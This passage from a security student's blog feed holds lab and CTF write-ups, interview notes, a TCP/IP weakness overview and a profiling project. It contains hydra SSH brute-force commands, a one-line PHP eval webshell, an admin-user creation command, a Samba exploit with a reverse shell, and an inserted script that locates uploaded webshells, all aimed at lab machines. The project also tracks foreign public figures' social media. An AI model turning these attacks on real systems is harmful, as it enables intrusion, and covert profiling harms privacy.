privilege escalation</li><li>Local information gathering</li><li>Lateral movement</li><li>Pivoting</li><li>Persistence</li></ul><h3 id="第十四章-Web应用测试"><a href="#第十四章-Web应用测试" class="headerlink" title="Chapter 14: Web Application Testing"></a>Chapter 14: Web Application Testing</h3><ul><li>Burp</li><li>SQL injection</li><li>XPath injection</li><li>Local file inclusion</li><li>Remote file inclusion</li><li>Command execution</li><li>Cross-site scripting</li><li>Cross-site request forgery</li></ul><h3 id="第十五章-攻击无线网络"><a href="#第十五章-攻击无线网络" class="headerlink" title="Chapter 15: Wireless Attacks"></a>Chapter 15: Wireless Attacks</h3><h3 id="第十六章-缓冲区溢出"><a href="#第十六章-缓冲区溢出" class="headerlink" title="Chapter 16: Buffer Overflows"></a>Chapter 16: Buffer Overflows</h3><h3 id="第十八章-SEH覆盖"><a href="#第十八章-SEH覆盖" class="headerlink" title="Chapter 18: SEH Overwrites"></a>Chapter 18: SEH Overwrites</h3><h3 id="第十九章-其他"><a href="#第十九章-其他" class="headerlink" title="Chapter 19: Fuzzing, Porting Exploits and Metasploit Modules"></a>Chapter 19: Fuzzing, Porting Exploits and Metasploit Modules</h3><ul><li>Fuzzing</li><li>Porting exploits</li><li>Writing Metasploit modules</li><li>Exploit mitigations</li></ul><h3 id="第十九章-智能收集渗透"><a href="#第十九章-智能收集渗透" class="headerlink" title="Chapter 20: Smartphone Pentesting"></a>Chapter 20: Smartphone Pentesting</h3><ul><li>Mobile attack vectors</li><li>Smartphone Pentest Framework</li><li>Remote attacks</li><li>Client-side attacks</li><li>Malicious apps</li><li>Mobile post exploitation</li></ul>]]></content>
<categories>
<category> Penetration Testing </category>
</categories>
<tags>
<tag> Penetration Testing </tag>
</tags>
</entry>
<entry>
<title>Meituan Security Engineer Interview (Internship)</title>
<link href="/2021/03/26/meituan/"/>
<url>/2021/03/26/meituan/</url>
<content type="html"><![CDATA[<p>2021-3-26</p><p>The interviewer was a security engineer who plays the guitar; he was friendly and asked no tricky questions.</p><p>The interview lasted only 15 minutes in total. I do not know why it was so short; perhaps he had other work to attend to.</p><p><strong>Questions:</strong></p><p>1. Self-introduction</p><p>2. How do you usually study security</p><p>3. How many hours a day do you spend on security</p><p>4. What kinds of SQL injection are there</p><p>5. Given a URL, how do you test it for injection</p><p>6. How to prevent SQL injection</p><p>7. Do you read security articles? Summarise one</p><p>I talked about the DNSlog injection article I had read the night before.</p><p>8. Talk about CTF</p><p>9. Talk about penetration tests you have done</p><p>Finally: do you have any questions for me?</p><p>1. How to study security</p><p>2. How security work differs between an in-house security team and a security vendor</p><p><strong>Advice</strong></p><p>I had read a few articles from Meituan's tech blog and the interviewer's own post on web honeypots beforehand, but I did not bring them up.</p><p>It helps to look up the interviewer's research interests in advance. If they match your strengths, great; if not, try to steer the conversation towards other topics so that the interviewer follows your projects instead.</p>]]></content>
<categories>
<category> Interviews </category>
</categories>
<tags>
<tag> Interviews </tag>
</tags>
</entry>
<entry>
<title>Network Reconnaissance Lab</title>
<link href="/2021/03/25/%E4%BE%A6%E5%AF%9F/"/>
<url>/2021/03/25/%E4%BE%A6%E5%AF%9F/</url>
<content type="html"><![CDATA[<h1 id="网络侦察实验"><a href="#网络侦察实验" class="headerlink" title="Network Reconnaissance Lab"></a>Network Reconnaissance Lab</h1><h3 id="实验背景"><a href="#实验背景" class="headerlink" title="Background"></a>Background</h3><p>As networks have spread, computer networks at every level in every country have come to hold large amounts of public and confidential data. Network vulnerabilities make it easy for intruders to break into these systems and obtain that data, which has drawn the attention of military intelligence services around the world; all of them now study and practise gathering intelligence through computer networks. This is network reconnaissance.</p><p>Network reconnaissance is every probing activity an attacker carries out against a target host, before or during an attack, so as to attack more effectively. It is sometimes called footprinting, and typically covers the target's domain names, IP addresses, operating system, open ports, the applications listening behind those ports, and whether those applications have known vulnerabilities. The information is collected through social engineering (which needs no technology at all), search engines and scanning tools.</p><p>This lab applies network reconnaissance in a realistic enterprise network so that students understand its concepts, characteristics and principles, master the related techniques, and acquire the ability to reconnoitre and penetrate a network, obtain sensitive information and defend against reconnaissance.</p><h3 id="实验任务"><a href="#实验任务" class="headerlink" title="Tasks"></a>Tasks</h3><p>Task 1: reconnoitre the network and sniff passwords with nmap and ettercap;<br>Task 2: brute-force the SSH login password with crunch and hydra;<br>Task 3: log in to the target over SSH and obtain sensitive information;<br>Task 4: obtain webshell access to the target website, take control of the host and obtain sensitive information.</p><h3 id="实验目的"><a href="#实验目的" class="headerlink" title="Objectives"></a>Objectives</h3><ul><li>Understand the basic concepts of network reconnaissance, information gathering and vulnerability discovery and exploitation, the common information-gathering and vulnerability-scanning tools, and the common reconnaissance techniques and enterprise network weaknesses.</li><li>Master nmap, analyse its results and use it to probe target networks and discover vulnerabilities.</li><li>Understand the basic functions of the ettercap sniffer and how to sniff the usernames and passwords of common services and applications.</li><li>Understand crunch and how to generate password wordlists with it.</li><li>Understand hydra and how to brute-force the credentials of common services and applications.</li><li>Understand what a webshell is, why and how one is uploaded, and how a webshell is used to control the target host.</li><li>Through nmap, ettercap, crunch and hydra, master the principles and methods of discovering, exploiting and attacking weaknesses in services such as FTP and web, learn mainstream enterprise scanning tools independently, and gain the professional skills needed to manage the security of complex enterprise networks.</li></ul><h3 id="实验工具"><a href="#实验工具" class="headerlink" title="Tools"></a>Tools</h3><ul><li>Nmap (bundled with Kali Linux)</li><li>ettercap (bundled with Kali Linux)</li><li>crunch (bundled with Kali Linux)</li><li>hydra (bundled with Kali Linux)</li><li>Firefox (54.2.0)</li><li>Rdesktop</li></ul><h3 id="实验环境"><a href="#实验环境" class="headerlink" title="Environment"></a>Environment</h3><table><thead><tr><th>Operating system</th><th>IP address</th><th>Role</th><th>Login credentials</th></tr></thead><tbody><tr><td>Kali Linux</td><td>192.168.1.2</td><td>Attacker</td><td>username root; password Simplexue123</td></tr><tr><td>CentOS7</td><td>192.168.1.3</td><td>Target</td><td>username root; password Simplexue123</td></tr><tr><td>Windows2012</td><td>192.168.1.4</td><td>Target</td><td>username administrator; password Simplexue123</td></tr></tbody></table><h3 id="实验步骤"><a href="#实验步骤" class="headerlink" title="Procedure"></a>Procedure</h3><h4 id="任务一"><a href="#任务一" class="headerlink" title="Task 1"></a>Task 1</h4><p>1. Scan for live hosts.</p><p><img src="https://i.loli.net/2021/03/25/zPknCDVjpW3Jmlx.png" alt="image-20210325150711857"></p><p>2. Sniff the target's vsftpd service.</p><p>Select the interface to listen on, pick the hosts, enable ARP spoofing and start sniffing to capture the packets on the network and recover the FTP username and password.</p><p><img src="https://i.loli.net/2021/03/25/zlgeGuf3kRQbNYM.png" alt="image-20210325152226044"></p><p><img src="https://i.loli.net/2021/03/25/iZNCDe15ytPux4G.png" alt="image-20210325153309224"></p><h4 id="任务二"><a href="#任务二" class="headerlink" title="Task 2"></a>Task 2</h4><p>Generate a password wordlist with the crunch tool bundled with Kali.<br>Brute-force the SSH login password with hydra to gain full control of the target.</p><p>Generate the wordlist with <code>crunch 9 9 password.txt -p hacker+123456</code>.</p><p>This produces nine-character combinations of letters and digits and writes them to password.txt.</p><p><img src="https://i.loli.net/2021/03/25/A9qhKSljfrw3dCU.png" alt="image-20210325154745860"></p><p>Brute-force SSH with the generated wordlist:</p><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">hydra -L hacker.txt -P password.txt -t 1 -vV -e ns 192.168.1.3 ssh</span><br></pre></td></tr></table></figure><p>The password recovered is hacker123.</p><h4 id="任务三"><a href="#任务三" class="headerlink" title="Task 3"></a>Task 3</h4><p>Log in to the target over SSH, read the key file and obtain the sensitive information.</p><p>Log in directly with the brute-forced password:</p><p><code>ssh hacker@192.168.1.3</code></p><p><img src="https://i.loli.net/2021/03/25/2nstiZqjApkCKHP.png" alt="image-20210325155633360"></p><p><img src="https://i.loli.net/2021/03/25/Jmz6WETX9Q8jGPh.png" alt="image-20210325155802866"></p><p><code>ls -a</code> lists the files, among them 1.key.</p><p><code>cat 1.key</code> prints the key.</p><h4 id="任务四"><a href="#任务四" class="headerlink" title="Task 4"></a>Task 4</h4><p>Obtain webshell access to the target website, take control of the host and obtain the sensitive information.</p><p>Create a one-line PHP webshell and an upload form:</p><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line"><?php @eval($_POST['attack']) ?></span><br></pre></td></tr></table></figure><p>Quickly open <code>http://192.168.1.4/index.php?module=eventregistration&action=eventsCalendar</code> in another browser tab to obtain the server's timestamp. Analysis shows that uploaded files are stored under the name timestamp, underscore, original file name.</p><p>Write a script that enumerates the candidate names and run it to obtain the URL of the uploaded file.</p><p><img src="https://i.loli.net/2021/03/25/RhfQO97VjGwEWia.png" alt="image-20210325183510613"></p><p>Execute a command through the webshell:</p><p><code>http://192.168.1.4/tmp/1516041535_exp.php?cmd=system('')</code></p><p>Add a new user: <code>net user hacker Beijing123 /add</code></p><p>Add the hacker user to the administrators group and connect to the target with remote desktop, taking care to use the right remote desktop port.</p><p>Log in to the target as hacker (username hacker, password Beijing123).</p><p>Make C:\2.key readable and view its content.</p>]]></content>
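A script of the kind the last task calls for, added here as an example; it is not the one used in the lab write-up. It enumerates the stored names an upload can have when the server names files as epoch timestamp, underscore, original name, and probes each candidate. The host, directory and file name come from the write-up; the width of the timestamp window is an assumption, and the in-memory stand-in for the server is constructed so that the search runs offline.

```python
"""Locate an upload stored as "epoch_originalname" by probing candidates
around a timestamp observed on the target.

Added example for the recon lab; not the script from the write-up. The host,
directory and file name come from the write-up, the window size is an
assumption, and FAKE_SERVER is a constructed stand-in for the target.
"""
import urllib.error
import urllib.request


def candidate_names(observed_epoch, original_name, window=5):
    """Yield stored names for every epoch within +/- window seconds."""
    for delta in range(-window, window + 1):
        yield f"{observed_epoch + delta}_{original_name}"


def http_exists(url, timeout=3):
    """Probe a URL with HEAD. False only for 404 or a connection error;
    a 403 still means the path exists."""
    request = urllib.request.Request(url, method="HEAD")
    try:
        with urllib.request.urlopen(request, timeout=timeout) as response:
            return response.status in range(200, 400)
    except urllib.error.HTTPError as err:
        return err.code != 404
    except (urllib.error.URLError, OSError):
        return False


def find_upload(base_url, observed_epoch, original_name, window=5,
                exists=http_exists):
    """Return the first candidate URL that exists, or None.

    Candidates are tried from the earliest epoch upwards, so the first hit is
    the upload closest to (or before) the observed time.
    """
    base = base_url.rstrip("/")
    for name in candidate_names(observed_epoch, original_name, window):
        url = f"{base}/tmp/{name}"
        if exists(url):
            return url
    return None


# Constructed stand-in for the target: the calendar page showed 1516041533 and
# the upload was stored two seconds later under the name the write-up found.
FAKE_SERVER = {"http://192.168.1.4/tmp/1516041535_exp.php"}


def fake_exists(url):
    return url in FAKE_SERVER


if __name__ == "__main__":
    hit = find_upload("http://192.168.1.4", 1516041533, "exp.php",
                      exists=fake_exists)
    print(hit or "not found in the window; widen it or re-check the timestamp")
```

Against a live target, drop the exists argument so the default HEAD probe is used; keep the window small, since every miss is a request the server logs.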
<categories>
<category> Penetration Testing </category>
</categories>
<tags>
<tag> Penetration Testing </tag>
</tags>
</entry>
<entry>
<title>Alibaba Security Engineer Interview (Internship)</title>
<link href="/2021/03/20/alibaba/"/>
<url>/2021/03/20/alibaba/</url>
<content type="html"><![CDATA[<p>3.10</p><p>Duration: 30 min</p><p>1. Self-introduction</p><p>2. Commonly used cryptographic algorithms and what each is used for</p><p>3. The SSL protocol</p><p>4. How do you study security</p><p>5. Your plans for the future</p><p>6. Which defensive technologies do companies commonly use</p><p>7. Questions about my projects: what I contributed, down to the details</p><p>The interviewer seemed young, shared some of his own experience and asked no tricky questions; very friendly.</p><p>3.16: rejection letter received.</p><p>I know my shortcomings well. It is a long road; keep going!</p>]]></content>
<categories>
<category> Interviews </category>
</categories>
<tags>
<tag> Interviews </tag>
</tags>
</entry>
<entry>
<title>TCP/IP Protocol Vulnerability Analysis</title>
<link href="/2021/03/19/TCPIP/"/>
<url>/2021/03/19/TCPIP/</url>
<content type="html"><![CDATA[<h3 id="TCP-x2F-IP协议簇"><a href="#TCP-x2F-IP协议簇" class="headerlink" title="The TCP/IP protocol suite"></a>The TCP/IP protocol suite</h3><p>TCP/IP provides end-to-end connectivity and standardises how data is packaged, addressed, transmitted, routed and received at the destination. It divides the communication process into four abstraction layers arranged as a protocol stack, each implemented by different protocols. Every protocol in the suite is assigned to one of the four layers according to its function; the model is often regarded as a simplified version of the seven-layer OSI model.</p><p>TCP (Transmission Control Protocol) and IP (Internet Protocol):</p><p>TCP/IP means that TCP and IP work together.</p><p>TCP handles the communication between application software (such as your browser) and the network software.</p><p>IP handles the communication between computers.</p><p>TCP splits the data into segments and hands them to IP for packaging, then reassembles them when they arrive.</p><p>IP delivers the packets to the receiver.</p><h3 id="安全隐患"><a href="#安全隐患" class="headerlink" title="Security risks"></a>Security risks</h3><p>1. Link-layer attacks</p><p>The link layer is the most complex part of a TCP/IP network, and the most common attack against it is sniffing. Ethernet, by far the most widely deployed LAN technology in China, is a shared medium. An Ethernet card normally accepts only the frames addressed to it, but it can also be put into promiscuous mode, in which it accepts every frame on the segment. An attacker on the segment can therefore capture traffic and recover accounts, passwords and other sensitive data from it.</p><p>2. ARP spoofing</p><p>ARP (Address Resolution Protocol) maps IP addresses to physical (MAC) addresses. Before a host sends an IP packet to another host on its subnet it needs that host's MAC address; if the address is not cached, it broadcasts an ARP request and the owner of the IP address answers with its MAC address. ARP is stateless: a host caches any ARP reply it receives, whether or not it sent a request, and nothing in the protocol authenticates the sender. An attacker can therefore send forged replies that bind the victim's or the gateway's IP address to the attacker's MAC address and redirect traffic through the attacker's machine, where it can be read or modified. Defences should not rely on the IP-to-MAC binding alone: static ARP entries, dynamic ARP inspection on switches and monitoring for changing bindings add the checks the protocol lacks.</p><p>3. ICMP abuse</p><p>ICMP (Internet Control Message Protocol) carries control messages between hosts and routers: whether the network is reachable, whether a host is up, whether a route is usable. When an error occurs, the host or router sends a message describing it. ICMP is important for network operation but easy to abuse because it is unauthenticated. A host flooded with large numbers of ICMP packets spends its CPU and bandwidth handling them and can become unresponsive; forged ICMP redirect or unreachable messages can also alter a victim's routing or tear down its connections.</p><p>4. IP spoofing</p><p>The network layer has its own problems. IP spoofing, forging the source address of packets, is an effective way for an attacker to hide: the attacker sends malicious requests to the target from a forged address and the target cannot identify the real source, or the attacker impersonates a host the target trusts in order to steal confidential information. IP spoofing is routinely used in DoS attacks, because packets arriving from a wide range of apparent sources cannot be filtered effectively and address-based defences lose most of their value. ICMP echo (ping) is part of the IP layer itself, so any host can send a ping and expect an answer; neither the ping implementation nor most firewalls, which usually allow ICMP by default, can tell a legitimate probe from a malicious one, so the channel is often left open.</p><p>5. DNS spoofing</p><p>On the Internet, domain names map to IP addresses, and the mapping is performed by name resolution through DNS servers. In DNS spoofing the attacker impersonates a name server and feeds the target false DNS records, so the user is directed to an attacker-controlled server while believing the forged IP address is genuine. Network interfaces also receive data that is not meant for their host, which trojans and other malware can exploit to leak data, another source of risk at the application layer.</p><h3 id="脆弱性分析"><a href="#脆弱性分析" class="headerlink" title="Vulnerability analysis"></a>Vulnerability analysis</h3><p>1. No reliable authentication of identity</p><p>2. No effective protection against information disclosure</p><p>3. No reliable integrity verification</p><p>4. No control over the consumption and allocation of resources</p><h3 id="攻击方法"><a href="#攻击方法" class="headerlink" title="Attack methods"></a>Attack methods</h3><ul><li>IP spoofing</li><li>TCP session hijacking</li><li>SYN flooding</li><li>Ping of death</li><li>RST and FIN attacks</li></ul><h3 id="结语"><a href="#结语" class="headerlink" title="Closing remarks"></a>Closing remarks</h3><p>Defending against attacks on protocol weaknesses requires management, technical and policy measures working together. As network security technology improves and IPsec matures, the existing protocol weaknesses should gradually be resolved.</p><h3 id="参考"><a href="#参考" class="headerlink" title="References"></a>References</h3><ul><li>Baidu Baike / Wikipedia</li><li>Runoob TCP/IP tutorial</li><li>典型的TCP/IP协议脆弱性及常见攻击方法分析 (Analysis of typical TCP/IP protocol vulnerabilities and common attack methods), Journal of Air Force Engineering University</li></ul>]]></content>
<categories>
<category> blog </category>
</categories>
<tags>
<tag> Security </tag>
</tags>
</entry>
<entry>
<title>leetcode15 - 3sum</title>
<link href="/2021/03/18/%E7%AE%97%E6%B3%95/"/>
<url>/2021/03/18/%E7%AE%97%E6%B3%95/</url>
<content type="html"><![CDATA[<blockquote><p>3sum resembles the earlier 2sum, but is a notch harder.</p></blockquote><p><a href="https://leetcode-cn.com/problems/3sum/">leetcode.15</a></p><h3 id="题目描述"><a href="#题目描述" class="headerlink" title="Problem"></a>Problem</h3><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">Given an array nums of n integers, are there elements a, b, c in nums such that a + b + c = 0? Find all unique triplets in the array which gives the sum of zero.</span><br><span class="line"></span><br><span class="line">Notice that the solution set must not contain duplicate triplets.</span><br></pre></td></tr></table></figure><p>Constraint: <code>0 <= nums.length <= 3000</code></p><h3 id="方法1"><a href="#方法1" class="headerlink" title="Approach 1"></a>Approach 1</h3><p>Enumerate every triplet. O(n^3) time; too slow.</p><h3 id="方法2"><a href="#方法2" class="headerlink" title="Approach 2"></a>Approach 2</h3><p>Sort the array.</p><p>Hashing (fix two elements, look up the third).</p><p>Loop over i and j; the third value must be t = 0 - nums[i] - nums[j].</p><p>Use a hash set to check whether t occurs in the array.</p><p><strong>Note: duplicates must be removed.</strong></p><h3 id="方法3"><a href="#方法3" class="headerlink" title="Approach 3"></a>Approach 3</h3><p>Sort the array.</p><p>Two pointers (fix one element, move two).</p><p>The two pointers must satisfy nums[j] + nums[k] = t = 0 - nums[i].</p><p>Idea:</p><p>Fix pointer i; j and k start at the two ends of the remaining range and move towards each other, depending on how their sum compares with t.</p><p><strong>Note: duplicates must be removed.</strong></p><h3 id="代码"><a href="#代码" class="headerlink" title="Code"></a>Code</h3><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> typing <span class="keyword">import</span> <span class="type">List</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">Solution</span>:</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">threeSum</span>(<span class="params">self, nums: <span class="type">List</span>[<span class="built_in">int</span>]</span>) -> <span class="type">List</span>[<span class="type">List</span>[<span class="built_in">int</span>]]:</span><br><span class="line">        <span class="comment"># Two-pointer scan: i is fixed, j and k move towards each other.</span></span><br><span class="line">        <span class="comment"># Sorting first makes both the pointer moves and the de-duplication work.</span></span><br><span class="line">        nums.sort()</span><br><span class="line">        lens = <span class="built_in">len</span>(nums)</span><br><span class="line">        res = []</span><br><span class="line">        <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(lens):</span><br><span class="line">            <span class="comment"># Skip repeated values of nums[i]; index 0 is never skipped.</span></span><br><span class="line">            <span class="keyword">if</span> i <span class="keyword">and</span> nums[i] == nums[i-<span class="number">1</span>]:</span><br><span class="line">                <span class="keyword">continue</span></span><br><span class="line">            j = i + <span class="number">1</span></span><br><span class="line">            k = lens - <span class="number">1</span></span><br><span class="line">            tmp = <span class="number">0</span> - nums[i]  <span class="comment"># nums[j] + nums[k] must equal this</span></span><br><span class="line">            <span class="keyword">while</span> j < k:</span><br><span class="line">                <span class="keyword">if</span> nums[j] + nums[k] > tmp:</span><br><span class="line">                    k = k - <span class="number">1</span></span><br><span class="line">                <span class="keyword">elif</span> nums[j] + nums[k] < tmp:</span><br><span class="line">                    j = j + <span class="number">1</span></span><br><span class="line">                <span class="keyword">else</span>:</span><br><span class="line">                    res.append([nums[i], nums[j], nums[k]])</span><br><span class="line">                    <span class="comment"># Skip duplicates on both sides before moving inward</span></span><br><span class="line">                    <span class="keyword">while</span> j < k <span class="keyword">and</span> nums[j] == nums[j+<span class="number">1</span>]:</span><br><span class="line">                        j = j + <span class="number">1</span></span><br><span class="line">                    <span class="keyword">while</span> j < k <span class="keyword">and</span> nums[k] == nums[k-<span class="number">1</span>]:</span><br><span class="line">                        k = k - <span class="number">1</span></span><br><span class="line">                    k = k - <span class="number">1</span></span><br><span class="line">                    j = j + <span class="number">1</span></span><br><span class="line">        <span class="keyword">return</span> res</span><br></pre></td></tr></table></figure><h3 id="小结"><a href="#小结" class="headerlink" title="Summary"></a>Summary</h3><p>The problem statement is simple, but the details matter:</p><ul><li>De-duplication</li><li>Using a hash map or set</li><li>Two pointers</li><li>Pruning</li><li>Special handling of the first position</li></ul>]]></content>
<categories>
<category> Algorithms </category>
</categories>
<tags>
<tag> Algorithms </tag>
<tag> leetcode </tag>
</tags>
</entry>
<entry>
<title>Penetration Testing Against Metasploitable2</title>
<link href="/2021/03/17/kali/"/>
<url>/2021/03/17/kali/</url>
<content type="html"><![CDATA[<blockquote><p>Metasploitable2 is an excellent target VM for practising penetration testing.</p></blockquote><h3 id="实验环境"><a href="#实验环境" class="headerlink" title="Environment"></a>Environment</h3><p>Attacker: Kali, IP 192.168.211.140</p><p>Target: Metasploitable2, IP 192.168.211.132</p><h3 id="信息收集"><a href="#信息收集" class="headerlink" title="Information gathering"></a>Information gathering</h3><p>1. Run <code>msfconsole</code> to enter the Metasploit console.</p><img src="https://i.loli.net/2021/03/17/xhgMnCZvJ3AlQyw.png" alt="image-20210317192744736" style="zoom:67%;" /><p>2. Scan the target with Nmap to list its open ports and services.</p><img src="https://i.loli.net/2021/03/17/rKnzR1EZijmV7aH.png" alt="image-20210317193125963" style="zoom:67%;" /><p>3. Choose a suitable exploit and payload based on the scan results.</p><p>Here the vulnerability in Samba 3.0 is used.</p><p><strong>Tip:</strong> modules whose rank is great or excellent work well and have a higher success rate.</p><img src="https://i.loli.net/2021/03/17/wyxbWKE4mLqVclX.png" alt="image-20210317193350796" style="zoom:67%;" /><p>4. Select the exploit module:</p><p><code>use exploit/multi/samba/usermap_script</code></p><p>Tip: <code>info</code> followed by a module name shows its description.</p><img src="https://i.loli.net/2021/03/17/oZJirFMjk5HC3h6.png" alt="image-20210317194342573" style="zoom:67%;" /><p><code>show payloads</code> lists the payloads that can be used with it.</p><p>5. Configure the payload:</p><p><code>set PAYLOAD cmd/unix/reverse</code></p><p>Set the target IP and port (RHOSTS and RPORT).</p><p>Set the attacker IP (LHOST).</p><p><strong>Note:</strong> the port here is the port of the vulnerable service, as seen in the Nmap output.</p><p><code>show options</code> shows the module and payload settings; parameters marked Required must be set.</p><img src="https://i.loli.net/2021/03/17/7uTQKxsf6aHDdLp.png" alt="image-20210317195047700" style="zoom:67%;" /><p>6. Run <code>exploit</code> to launch the attack.</p><img src="https://i.loli.net/2021/03/17/T1SDBs5F8KPjOWi.png" alt="image-20210317195453218" style="zoom:67%;" /><p>A shell on the target has been obtained!</p><p>Verify it with <code>uname -a</code>.</p><h3 id="后续"><a href="#后续" class="headerlink" title="Next steps"></a>Next steps</h3><ul><li>Gather more information about the target system</li><li>Disable the target's antivirus software</li><li>Use the compromised host as a pivot</li><li>Post-exploitation (privilege escalation, horizontal and vertical)</li><li>Leave a backdoor</li><li>Clean up traces</li></ul>]]></content>
<categories>
<category> Penetration Testing </category>
</categories>
<tags>
<tag> Vulnerabilities </tag>
<tag> Penetration Testing </tag>
</tags>
</entry>
<entry>
<title>Public-Opinion Analysis: Person Profiling</title>
<link href="/2021/03/16/NLP/"/>
<url>/2021/03/16/NLP/</url>
<content type="html"><![CDATA[<blockquote><p>I have been working on a public-opinion analysis project recently; a few notes.</p></blockquote><h3 id="所需技术"><a href="#所需技术" class="headerlink" title="Techniques required"></a>Techniques required</h3><ul><li>Web crawling</li><li>Topic analysis</li><li>Person profiling</li><li>Named entity recognition</li><li>Opinion extraction</li><li>Sentiment classification</li><li>Text classification</li></ul><h3 id="任务"><a href="#任务" class="headerlink" title="Task"></a>Task</h3><p>Project: profiles of foreign public figures who comment on China</p><ul><li><p>Number of people: at least 100</p></li><li><p>Countries/regions: the United States, Japan, Australia, India, Europe, Southeast Asia, Russia, Hong Kong and Taiwan</p></li><li><p>Fields: think tanks, military intelligence, politics, law, high technology (AI, chips, telecommunications, electronics, materials, space, aerospace, etc.), entertainment, humanities, graduates of well-known universities</p></li><li><p>Real-time tracking of social media activity (Twitter, Facebook, Line, LinkedIn)</p></li><li><p>Social connections and a social-influence index</p></li><li><p>Personality analysis: the Big Five model</p></li><li><p>Statements about China (text, audio and video), trending topics and their sentiment polarity</p></li><li><p>An index of favourability towards China</p></li></ul><h3 id="预期成果"><a href="#预期成果" class="headerlink" title="Expected results"></a>Expected results</h3><p>Track activity on Twitter, Facebook and other social media in real time and generate profiles of foreign figures who comment on China. The people span several countries and regions; for each, analyse the social-influence index, Big Five personality and favourability towards China, and perform in-depth sentiment analysis of their statements about China.</p><p>Using visualisation and a graphical interface, crawl the publicly available information about these people from public social media and accomplish the stated goals, producing a prototype platform that collects and analyses information from public media, with real practical value.</p><h3 id="初步模型"><a href="#初步模型" class="headerlink" title="Initial model"></a>Initial model</h3><img src="https://i.loli.net/2021/03/18/uXe1no9hW6JNyDj.png" align="left" alt="Untitled diagram" style="zoom: 80%;" /><h3 id="实现过程"><a href="#实现过程" class="headerlink" title="Implementation"></a>Implementation</h3><h4 id="数据爬取及处理"><a href="#数据爬取及处理" class="headerlink" title="Data collection and processing"></a>Data collection and processing</h4><h4 id="社交指数分析"><a href="#社交指数分析" class="headerlink" title="Social-influence index"></a>Social-influence index</h4><p><img src="https://i.loli.net/2021/03/18/mD2n8yhNLQdfwig.png" alt="image-20210318100300846"></p><p><img src="https://i.loli.net/2021/03/18/Jl8Nrj1uORhQSF9.png" alt="image-20210318100319880"></p><h4 id="涉华言论情感分析"><a href="#涉华言论情感分析" class="headerlink" title="Sentiment analysis of statements about China"></a>Sentiment analysis of statements about China</h4><h4 id="人格分析"><a href="#人格分析" class="headerlink" title="Personality analysis"></a>Personality analysis</h4><p>The Big Five personality traits:</p><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">Openness</span><br><span class="line">    imagination, aesthetic sensitivity, emotional richness, novelty seeking, creativity, intellect.</span><br><span class="line">Conscientiousness</span><br><span class="line">    competence, fairness, orderliness, dutifulness, achievement striving, self-discipline, deliberation, restraint.</span><br><span class="line">Extraversion</span><br><span class="line">    warmth, gregariousness, assertiveness, activity, excitement seeking, optimism.</span><br><span class="line">Agreeableness</span><br><span class="line">    trust, altruism, straightforwardness, compliance, modesty, empathy.</span><br><span class="line">Neuroticism</span><br><span class="line">    difficulty regulating anxiety, hostility, depression, self-consciousness, impulsiveness and vulnerability; that is, a lack of emotional stability.</span><br></pre></td></tr></table></figure><h4 id="对华好感指数"><a href="#对华好感指数" class="headerlink" title="Favourability towards China"></a>Favourability towards China</h4><p>Favourability towards China is explored separately for each field.</p><p><img src="https://i.loli.net/2021/03/18/5oacYN6hOZgif8w.png" alt="image-20210318100623093"></p><h4 id="热点话题抽取"><a href="#热点话题抽取" class="headerlink" title="Trending topic extraction"></a>Trending topic extraction</h4><p><img src="https://i.loli.net/2021/03/18/XBmGutHdZTwyj5K.png" alt="image-20210318100532182"></p><p>PS: this project was a group effort; the source code is not public for now.</p>]]></content>
<categories>
<category> blog </category>
</categories>
</entry>
<entry>
<title>V&N-CTF</title>
<link href="/2021/03/14/VN/"/>
<url>/2021/03/14/VN/</url>
<content type="html"><![CDATA[<h3 id="web游戏题"><a href="#web游戏题" class="headerlink" title="Web game challenge"></a>Web game challenge</h3><p>Hint: finish the game to get the flag.</p><p>I first tried changing start_level, but the game would not start directly at level 10.</p><p>Next I changed the nextLevel that Reset() sets after death, let the character die and pressed Esc: the level that loaded was the one I had set.</p><p>The boss turned out to be very hard to beat, so I also changed the character's stats: health, number of darts and so on.</p><p><img src="https://i.loli.net/2021/03/14/8WzIQXblDZR3Nng.png" alt="image-20210314235011044"></p><figure class="highlight javascript"><table><tr><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">Reset</span>(<span class="params"></span>)</span><br><span class="line">{</span><br><span class="line">    <span class="comment">// load local storage</span></span><br><span class="line">    playerData = <span class="keyword">new</span> <span class="title class_">PlayerData</span>();</span><br><span class="line">    <span class="keyword">if</span> (<span class="variable language_">localStorage</span>.<span class="property">kbap_coins</span>)</span><br><span class="line">        playerData.<span class="property">coins</span> = <span class="built_in">parseInt</span>(<span class="variable language_">localStorage</span>.<span class="property">kbap_coins</span>, <span class="number">10</span>);</span><br><span class="line">    <span class="keyword">if</span> (<span class="variable language_">localStorage</span>.<span class="property">kbap_warp</span>)</span><br><span class="line">        warpLevel = <span class="built_in">parseInt</span>(<span class="variable language_">localStorage</span>.<span class="property">kbap_warp</span>, <span class="number">10</span>);</span><br><span class="line">    <span class="keyword">if</span> (<span class="variable language_">localStorage</span>.<span class="property">kbap_bestTime</span>)</span><br><span class="line">        speedRunBestTime = <span class="built_in">parseInt</span>(<span class="variable language_">localStorage</span>.<span class="property">kbap_bestTime</span>, <span class="number">10</span>);</span><br><span class="line">    nextLevel = <span class="number">10</span>;  <span class="comment">// patched: jump straight to the final level after a death</span></span><br><span class="line">}</span><br></pre></td></tr></table></figure><p><img src="https://i.loli.net/2021/03/14/fcKorsJpBRiPVH3.png" alt="image-20210314235140421"></p><p>Beat the boss, got the flag.</p><p>A fun game!</p>]]></content>
<categories>
<category> CTF </category>
</categories>
</entry>
<entry>
<title>Cloud Honeypots</title>
<link href="/2021/03/13/%E8%9C%9C%E7%BD%90/"/>
<url>/2021/03/13/%E8%9C%9C%E7%BD%90/</url>
